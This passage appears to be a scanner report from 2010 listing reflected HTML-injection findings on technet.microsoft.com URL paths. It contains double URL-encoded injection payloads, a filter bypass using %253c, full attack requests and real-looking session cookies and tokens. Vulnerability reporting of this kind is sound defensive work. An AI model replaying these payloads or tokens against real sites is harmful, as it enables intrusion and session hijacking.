Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:20:37 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb742457.aspx7bce8"><a>7b6302c4f0" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1aba0%2522%253e%253ca%253e7a9d7184e84 was submitted in the REST URL parameter 1. This input was echoed as 1aba0"><a>7a9d7184e84 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us1aba0%2522%253e%253ca%253e7a9d7184e84/library/bb742548.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10201
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:18:52 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us1aba0"><a>7a9d7184e84/library/bb742548" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5422%2522%253e%253ca%253e0e861349984 was submitted in the REST URL parameter 2. This input was echoed as d5422"><a>0e861349984 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/libraryd5422%2522%253e%253ca%253e0e861349984/bb742548.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=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&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:19:37 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/libraryd5422"><a>0e861349984/bb742548" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bb68%2522%253e%253ca%253e179b803ea96 was submitted in the REST URL parameter 3. This input was echoed as 5bb68"><a>179b803ea96 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb742548.aspx5bb68%2522%253e%253ca%253e179b803ea96 HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:20:23 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb742548.aspx5bb68"><a>179b803ea96" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d607%2522%253e%253ca%253eac02de82e96 was submitted in the REST URL parameter 1. This input was echoed as 7d607"><a>ac02de82e96 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us7d607%2522%253e%253ca%253eac02de82e96/library/bb742578.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:18:13 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us7d607"><a>ac02de82e96/library/bb742578" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dd097%2522%253e%253ca%253ecc6f454d985 was submitted in the REST URL parameter 2. This input was echoed as dd097"><a>cc6f454d985 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/librarydd097%2522%253e%253ca%253ecc6f454d985/bb742578.aspx HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=kOokMFaWxlA23AvE+Hovb9H4y1RUhQy0AU4/eVbZGzjiVHeqWzr/U+x5WqOMs1wSjM91O37I3cnEdc66bC0AgM6Me9o2VpGUwASFFCJax9pYsoyR7i3/3YqEXumj8F3mJjRzFHUi1+Et6Lv3JYFfrmA+3diPodM+l37yEfrZyhceWOUk10TzViXSa6HYG1I1+4/93tyRU+kGk6Mr1VlUyKlrXONfWaTRG0csjFD+YjB2GWm9i/TA7QK3mLWbGSsMuceHtFBSzcrEDusOszypFD5LPLQUEkAJ6qGsxa4xu19Q1rb6qDc7UabaddRla0WBX5CBvgrPCA8MhzBrb7Balkx6W+cGi98BA3s04XsAUvSTikJ1PXw8D88GLHK5YV0rF4bdzrv0KD0lOyVEe0pqiW5ewoo5zVdgiSSYqDrGcjngnvCIfEJHAIplHQVNkuG9+b+J46TmrdcZPOlFCnupmEwQpvgkkLhAYlguUsfZfueJyAr6xluaRhuDt9cCVMQQqFUgCHKqndmbkc0cqlGCAtnbHNkgFBl6VK+iHeYeK9I=&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10200
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:18:42 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/librarydd097"><a>cc6f454d985/bb742578" /> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f426%2522%253e%253ca%253e0091db8f5bb was submitted in the REST URL parameter 3. This input was echoed as 6f426"><a>0091db8f5bb in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request
GET /en-us/library/bb742578.aspx6f426%2522%253e%253ca%253e0091db8f5bb HTTP/1.1
Host: technet.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: viewkey=loband; __unam=289c965-12c804ebf38-f510776-6; A=I&I=AxUFAAAAAADbBwAAjKqmyq1K5WwI6hKdKtUzqQ!!&CS=126E8Q002h1AU000023AU0702g3AU070011AU00; omniID=1288464667483_ece7_1b36_0ec9_2fcbd29a1c1f; MC1=GUID=f1a102a6b711dc4999c8e0928915c187&HASH=a602&LV=20109&V=3; MSID=Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.VisitStartDate=12/11/2010 17:22:51&Microsoft.CookieId=9bb9eedb-25ce-4924-8c84-c86a7132000a&Microsoft.TokenId=bb5abe68-350a-4855-bb54-c1c0407d4103&Microsoft.NumberOfVisits=4&Microsoft.IdentityToken=...[SNIP]...&Microsoft.MicrosoftId=0350-9739-3156-7394; WT_FPC=id=174.121.222.18-3920860384.30102171:lv=1291936734781:ss=1291936734119; mcI=Sat, 06 Nov 2010 18:51:25 GMT; R=200011749-12/9/2010 19:18:57|OC-12/9/2010 19:18:57|200008813-11/24/2010 17:54:28; MUID=34AD5BBBF6FC477CAC5139C76AA247F9; msresearch=%7B%22version%22%3A%224.6%22%2C%22state%22%3A%7B%22name%22%3A%22IDLE%22%2C%22url%22%3Aundefined%2C%22timestamp%22%3A1291943937802%7D%2C%22lastinvited%22%3A1291943937802%2C%22userid%22%3A%221291943937802588694703765213%22%2C%22vendorid%22%3A1%2C%22surveys%22%3A%5Bundefined%5D%7D; MS0=e6b8850fc3b54b87b9cd070b16412ced; MICROSOFTSESSIONCOOKIE=Microsoft.CookieId=d6e27d60-f0fa-4bfe-9716-c70279dffb78&Microsoft.CreationDate=12/11/2010 17:22:51&Microsoft.LastVisitDate=12/11/2010 17:29:24&Microsoft.NumberOfVisits=4&SessionCookie.Id=1E916CC2D24CC93FDF3A64D92B0C37CF; __qca=P0-1185849018-1290642834531; ixpLightBrowser=1;
Response (redirected)
HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 10210
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: Sto.UserLocale=en-us; path=/
X-AspNetMvc-Version: 2.0
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 11 Dec 2010 18:19:21 GMT
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"> <head> <met ...[SNIP]... <input type="hidden" name="fromPage" value="http://technet.microsoft.com/en-us/Message-Error.htm.htm?aspxerrorpath=/en-us/library/bb742578.aspx6f426"><a>0091db8f5bb" /> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74ced%2522%253e%253ca%253ef8c0a390206 was submitted in the REST URL parameter 1. This input was echoed as 74ced"><a>f8c0a390206 in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Remediation detail
